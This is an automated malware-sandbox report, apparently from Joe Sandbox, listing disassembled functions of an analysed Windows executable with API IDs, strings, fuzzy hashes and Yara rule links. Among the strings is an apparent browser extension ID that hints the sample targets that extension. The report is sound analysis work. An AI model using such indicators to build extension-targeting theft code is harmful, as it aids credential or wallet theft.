                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                  • Opcode ID: e3650d58ace5e01d80639c9bdd661b0cca838cd5a2a9cc277d233d04e7258adf
                                                                                                                                                                  • Instruction ID: d0590cdb3f7caff350997e698ddbf48736e65d3189e1f5a966c829cbd90a536a
                                                                                                                                                                  • Opcode Fuzzy Hash: e3650d58ace5e01d80639c9bdd661b0cca838cd5a2a9cc277d233d04e7258adf
                                                                                                                                                                  • Instruction Fuzzy Hash: 43418362908AC5C5E752EF21CC102BDBBA8EB65FA4F998071C6CC47345DE3D9445CB22
                                                                                                                                                                  Function 00007FF72C9EE248 Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ByteCharErrorLastMultiWide
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 203985260-0
                                                                                                                                                                  • Opcode ID: bf6f6ff787d63ec9e95bb80f5333d1c21f0963902c8af30d1e5921e00fe17b2e
                                                                                                                                                                  • Instruction ID: 91dd76e6dede5107edaa2a6c2e0ae8ac8fe0a14db9db2969c8dfac49348714b1
                                                                                                                                                                  • Opcode Fuzzy Hash: bf6f6ff787d63ec9e95bb80f5333d1c21f0963902c8af30d1e5921e00fe17b2e
                                                                                                                                                                  • Instruction Fuzzy Hash: 96215B72A18BD187E3109F12E80432EB6B4F7A9B90F644139DB8863B58DF3CD4018F44
                                                                                                                                                                  Function 00007FF72C9EE03C Relevance: 6.0, APIs: 4, Instructions: 34COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorFileHandleInformationLast
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 275135790-0
                                                                                                                                                                  • Opcode ID: c3f294a01001bde1e672a3baf64a8f8c8c5e461723a8d9167fea38aa2c63fd5f
                                                                                                                                                                  • Instruction ID: 233d593fba5ab35c7f30e3c782609081c890ae07208b678619463b2dc9d4a6db
                                                                                                                                                                  • Opcode Fuzzy Hash: c3f294a01001bde1e672a3baf64a8f8c8c5e461723a8d9167fea38aa2c63fd5f
                                                                                                                                                                  • Instruction Fuzzy Hash: FDF0F931A0C1C1C3F7946B70EC5467DB6A4DF70765F940131C54E51A94DF2CE6888F61
                                                                                                                                                                  Function 00007FF72C9E0810 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 229COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: Bad escape sequence in string$Empty escape sequence in string
                                                                                                                                                                  • API String ID: 0-928816353
                                                                                                                                                                  • Opcode ID: 4839d7d4b103d010759f828f1e26a556bcb70bee1eced7327b0ca9b5a3e41859
                                                                                                                                                                  • Instruction ID: 9126539efedd95d3952da25caab1dc058f781929d9142e9a6ad7d4f78383d424
                                                                                                                                                                  • Opcode Fuzzy Hash: 4839d7d4b103d010759f828f1e26a556bcb70bee1eced7327b0ca9b5a3e41859
                                                                                                                                                                  • Instruction Fuzzy Hash: 5181F133A0D7C186EB05AB25D84127CB761EB71BE4F949232DA9D03B95DE2DE081DB50
                                                                                                                                                                  Function 00007FF72CA11580 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 194COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00007FF72CA10EDC: GetOEMCP.KERNEL32(?,?,?,?,?,?,FFFFFFFD,00007FF72CA11218), ref: 00007FF72CA10F06
                                                                                                                                                                  • IsValidCodePage.KERNEL32(?,?,?,00000001,?,00000000,?,00007FF72CA11349), ref: 00007FF72CA115ED
                                                                                                                                                                  • GetCPInfo.KERNEL32(?,?,?,00000001,?,00000000,?,00007FF72CA11349), ref: 00007FF72CA11631
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CodeInfoPageValid
                                                                                                                                                                  • String ID: *L\(&.
                                                                                                                                                                  • API String ID: 546120528-578493202
                                                                                                                                                                  • Opcode ID: e5290eb82c795fd96b905e5c022d71a02e82c691f0e7f0f195523f7161d9b7a4
                                                                                                                                                                  • Instruction ID: bf0349d2521b670a801afa84907eaa00373250d5905c58a8000620d3356226e1
                                                                                                                                                                  • Opcode Fuzzy Hash: e5290eb82c795fd96b905e5c022d71a02e82c691f0e7f0f195523f7161d9b7a4
                                                                                                                                                                  • Instruction Fuzzy Hash: 5081F262A0C68286F764AF25BC148B9F7B1EB607A0FC85036C79D07690DEBDE541CF60
                                                                                                                                                                  Function 00007FF72CA104C8 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 179COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • _invalid_parameter_noinfo.LIBCMT ref: 00007FF72CA104F8
                                                                                                                                                                    • Part of subcall function 00007FF72C9FCD60: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF72C9FCD0F,?,?,?,?,?,00007FF72C9FCBFA), ref: 00007FF72C9FCD69
                                                                                                                                                                    • Part of subcall function 00007FF72C9FCD60: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF72C9FCD0F,?,?,?,?,?,00007FF72C9FCBFA), ref: 00007FF72C9FCD8E
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CurrentFeaturePresentProcessProcessor_invalid_parameter_noinfo
                                                                                                                                                                  • String ID: *?$*L\(&.
                                                                                                                                                                  • API String ID: 4036615347-91290236
                                                                                                                                                                  • Opcode ID: dda00173b4e44c809c0c79a8e33fb17a7a28cbf0e9f91cc35e83d2dcdfa64a8d
                                                                                                                                                                  • Instruction ID: 93e62caeed2b1c710711bafb10347d13ce52a2a0e21b1fa08daf2e2f23cdcdbf
                                                                                                                                                                  • Opcode Fuzzy Hash: dda00173b4e44c809c0c79a8e33fb17a7a28cbf0e9f91cc35e83d2dcdfa64a8d
                                                                                                                                                                  • Instruction Fuzzy Hash: 3351F412B0865241FB50BA21AD01ABDB7B1EFA4BF4F846531DE1D17B85DEBCE04187A0
                                                                                                                                                                  Function 00007FF72C9F6BFC Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 163COMMONLIBRARYCODE
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: __except_validate_context_record
                                                                                                                                                                  • String ID: csm$csm
                                                                                                                                                                  • API String ID: 1467352782-3733052814
                                                                                                                                                                  • Opcode ID: c41babcde769611a9ebafd1821e8d1a95b947c620c220eb6377b327e93ce6598
                                                                                                                                                                  • Instruction ID: ca5f3a8a6295b921b07dee4f5c67439820b96b75d31675189648d87e41780917
                                                                                                                                                                  • Opcode Fuzzy Hash: c41babcde769611a9ebafd1821e8d1a95b947c620c220eb6377b327e93ce6598
                                                                                                                                                                  • Instruction Fuzzy Hash: 6A71A27390878186DB60AF25D85077DBBA5FB24BA8F948135DBCC47A89CB3CD461CB60
                                                                                                                                                                  Function 00007FF72C9CCD20 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 153COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 73155330-3916222277
                                                                                                                                                                  • Opcode ID: f2de5217babcd77d928677b88b79d638c8c08cff1190c9d0b5c23f1cceca7cab
                                                                                                                                                                  • Instruction ID: d62a45f1846c60ab9157b7cc2a8a43b3b195e519be0c8791696536c17b19d2ef
                                                                                                                                                                  • Opcode Fuzzy Hash: f2de5217babcd77d928677b88b79d638c8c08cff1190c9d0b5c23f1cceca7cab
                                                                                                                                                                  • Instruction Fuzzy Hash: 2C518F72A08F4596EB159F2AD85026C7BA0FB59BA0F944531CF8D43BA0CF3CE5A1CB10
                                                                                                                                                                  Function 00007FF72C9B6770 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 142COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                  • String ID: *L\(&.$indentation
                                                                                                                                                                  • API String ID: 3668304517-3604478598
                                                                                                                                                                  • Opcode ID: f39550dfe8ffabea9a5528fd322858f3fd072d8e62f1118f90b73d3950f90394
                                                                                                                                                                  • Instruction ID: 1fff4b0f7649e4dd23b19fce79e72cf260b96de4ee1ba88db7fd1b0a7624b213
                                                                                                                                                                  • Opcode Fuzzy Hash: f39550dfe8ffabea9a5528fd322858f3fd072d8e62f1118f90b73d3950f90394
                                                                                                                                                                  • Instruction Fuzzy Hash: D151C922F18B4196FB00EBB0DC503ED6372EB61768F805535DE4C2BA99DE38E545C794
                                                                                                                                                                  Function 00007FF72C9E10B0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                  • String ID: *L\(&.
                                                                                                                                                                  • API String ID: 3668304517-578493202
                                                                                                                                                                  • Opcode ID: 091db9e1f842701b09e0c17b4d7ef31c2767c5dced29b299510ad71839a3d607
                                                                                                                                                                  • Instruction ID: 2ef58bda6d215009533cdea86e186ce19036fce760fe22f3dfc001a4fc434985
                                                                                                                                                                  • Opcode Fuzzy Hash: 091db9e1f842701b09e0c17b4d7ef31c2767c5dced29b299510ad71839a3d607
                                                                                                                                                                  • Instruction Fuzzy Hash: AE51B862E18FC582EB14DF25E84036DA360FBA97A4F505222EB8D07A56DF7CD5E1CB40
                                                                                                                                                                  Function 00007FF72C9E0D40 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 133COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  • expecting another \u token to begin the second half of a unicode surrogate pair, xrefs: 00007FF72C9E0E95
                                                                                                                                                                  • additional six characters expected to parse unicode surrogate pair., xrefs: 00007FF72C9E0DB2
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                  • String ID: additional six characters expected to parse unicode surrogate pair.$expecting another \u token to begin the second half of a unicode surrogate pair
                                                                                                                                                                  • API String ID: 3668304517-1961466578
                                                                                                                                                                  • Opcode ID: 513d0a1c3b93cbef55f5ce4d2acb5fd99c13a7cb91e6d9e34a0cd819b1abd28e
                                                                                                                                                                  • Instruction ID: 371e2de1464d289428ba006b948ef847ee5b356940e227cff61a565a2905c4a1
                                                                                                                                                                  • Opcode Fuzzy Hash: 513d0a1c3b93cbef55f5ce4d2acb5fd99c13a7cb91e6d9e34a0cd819b1abd28e
                                                                                                                                                                  • Instruction Fuzzy Hash: 62411962A1C7C641DA109B25E840279A350EBB57F0F846236FEDD037DADE3CE1919B50
                                                                                                                                                                  Function 00007FF72CA10FF4 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 128COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Info
                                                                                                                                                                  • String ID: $*L\(&.
                                                                                                                                                                  • API String ID: 1807457897-874453505
                                                                                                                                                                  • Opcode ID: 58b3b838fdee78b91ea1146c3f04e2bc4c9e6a3a9237f8707bf0f98f6ac359f1
                                                                                                                                                                  • Instruction ID: 033f777319c0f4cdcd04b99f5df9797eb65758d5aec3d55f375b978de16f809e
                                                                                                                                                                  • Opcode Fuzzy Hash: 58b3b838fdee78b91ea1146c3f04e2bc4c9e6a3a9237f8707bf0f98f6ac359f1
                                                                                                                                                                  • Instruction Fuzzy Hash: DE51AF32A1C6C18AE7219F24E884BAEBBB0F758764F94513AD78D43A85CBBCD115CF50
                                                                                                                                                                  Function 00007FF72C9D4730 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 128COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                                                                                                                                  • String ID: egjidjbpglichdcondbcbdnbeeppgdph
                                                                                                                                                                  • API String ID: 73155330-1098953746
                                                                                                                                                                  • Opcode ID: c537633c8a8cf0bbd30bd273d8eef7af378dd3a46989c6079deabae4d7cc3aea
                                                                                                                                                                  • Instruction ID: ecc996053fa7f65a23865fab40db802bf450bfd7386a35fd43c1f651d5b23f09
                                                                                                                                                                  • Opcode Fuzzy Hash: c537633c8a8cf0bbd30bd273d8eef7af378dd3a46989c6079deabae4d7cc3aea
                                                                                                                                                                  • Instruction Fuzzy Hash: D441DD61B08A8195EA18BB11A80827DA2A4FB55BF4FD40731DAAC17BD8EF3CE091C710
                                                                                                                                                                  Function 00007FF72CA0D1E4 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 122COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                                                                                                                  • String ID: ?
                                                                                                                                                                  • API String ID: 1286766494-1684325040
                                                                                                                                                                  • Opcode ID: 48e3008d8add20568576d01918fd25e93ee924fc5f9ca016848dd5200c8aeb46
                                                                                                                                                                  • Instruction ID: 0f95bfec103b08fdfe912170bc9a058030d96109e1fcdb53fafcc46452b8e898
                                                                                                                                                                  • Opcode Fuzzy Hash: 48e3008d8add20568576d01918fd25e93ee924fc5f9ca016848dd5200c8aeb46
                                                                                                                                                                  • Instruction Fuzzy Hash: A941D423E0878246FB64AB35B841B7AA670EBA1BF4F904235EE5D06AD5DF3DD441CB10
                                                                                                                                                                  Function 00007FF72C9F7294 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 120COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CreateFrameInfo__except_validate_context_record
                                                                                                                                                                  • String ID: csm
                                                                                                                                                                  • API String ID: 2558813199-1018135373
                                                                                                                                                                  • Opcode ID: bba117021f344cf8f4e789ab315634a830666d67b1e2a12394e23247ba1d153d
                                                                                                                                                                  • Instruction ID: d01619225b4ca94862e9dbb4400af49a75eb0df6b738c71e8e3c98ebb5f1a4a0
                                                                                                                                                                  • Opcode Fuzzy Hash: bba117021f344cf8f4e789ab315634a830666d67b1e2a12394e23247ba1d153d
                                                                                                                                                                  • Instruction Fuzzy Hash: 64515E72619B4186EA20EB16E84026DB7B8FB99BA0F540535DBCD47B55CF3CE4A1CF20
                                                                                                                                                                  Function 00007FF72C9E0F20 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 116COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  • Bad unicode escape sequence in string: hexadecimal digit expected., xrefs: 00007FF72C9E103D
                                                                                                                                                                  • Bad unicode escape sequence in string: four digits expected., xrefs: 00007FF72C9E0F60
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                  • String ID: Bad unicode escape sequence in string: four digits expected.$Bad unicode escape sequence in string: hexadecimal digit expected.
